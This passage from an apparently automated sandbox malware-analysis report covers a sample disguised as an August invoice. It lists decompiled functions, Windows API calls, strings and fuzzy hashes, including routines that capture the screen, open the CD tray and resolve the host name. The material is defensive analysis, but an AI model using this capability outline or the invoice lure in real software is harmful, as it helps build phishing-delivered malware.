                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                          • String ID: %s%u
                                                          • API String ID: 1899580136-679674701
                                                          • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                          • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                          • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                          • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                          APIs
                                                          • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                          • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                          • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu$Sleep
                                                          • String ID: 0
                                                          • API String ID: 1196289194-4108050209
                                                          • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                          • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                          • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                          • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 0043143E
                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                          • SelectObject.GDI32(00000000,?), ref: 00431466
                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                          • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                          • String ID: (
                                                          • API String ID: 3300687185-3887548279
                                                          • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                          • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                          • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                          • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                          APIs
                                                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                          • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                          • API String ID: 1976180769-4113822522
                                                          • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                          • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                          • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                          • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                          • String ID:
                                                          • API String ID: 461458858-0
                                                          • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                          • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                          • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                          • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                          • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                          • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                          • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                          • DeleteObject.GDI32(?), ref: 004301D0
                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                          • String ID:
                                                          • API String ID: 3969911579-0
                                                          • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                          • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                          • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                          • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                          • String ID: 0
                                                          • API String ID: 956284711-4108050209
                                                          • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                          • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                          • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                          • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                          • String ID: 0.0.0.0
                                                          • API String ID: 1965227024-3771769585
                                                          • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                          • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                          • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                          • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                          APIs
                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: SendString$_memmove_wcslen
                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                          • API String ID: 369157077-1007645807
                                                          • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                          • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                          • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                          • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                          APIs
                                                          • GetParent.USER32 ref: 00445BF8
                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                          • __wcsicoll.LIBCMT ref: 00445C33
                                                          • __wcsicoll.LIBCMT ref: 00445C4F
                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __wcsicoll$ClassMessageNameParentSend
                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                          • API String ID: 3125838495-3381328864
                                                          • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                          • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                          • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                          • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                          APIs
                                                          • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                          • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                          • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                          • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                          • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CharNext
                                                          • String ID:
                                                          • API String ID: 1350042424-0
                                                          • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                          • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                          • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                          • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                          APIs
                                                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                          • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                          • _wcscpy.LIBCMT ref: 004787E5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                          • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                          • API String ID: 3052893215-2127371420
                                                          • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                          • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                          • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                          • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                          APIs
                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                          • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                          • __swprintf.LIBCMT ref: 0045E7F7
                                                          • _wprintf.LIBCMT ref: 0045E8B3
                                                          • _wprintf.LIBCMT ref: 0045E8D7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 2295938435-2354261254
                                                          • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                          • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                          • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                          • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __swprintf_wcscpy$__i64tow__itow
                                                          • String ID: %.15g$0x%p$False$True
                                                          • API String ID: 3038501623-2263619337
                                                          • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                          • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                          • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                          • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                          APIs
                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                          • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                          • __swprintf.LIBCMT ref: 0045E5F6
                                                          • _wprintf.LIBCMT ref: 0045E6A3
                                                          • _wprintf.LIBCMT ref: 0045E6C7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
